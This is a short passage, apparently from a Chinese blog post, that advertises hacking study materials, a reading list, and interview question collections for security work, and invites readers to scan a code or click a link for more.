其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
5.黑客必读书单
**
**
6.面试题合集
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
更多内容为防止和谐,可以扫描获取~
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
扫一扫
4949
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
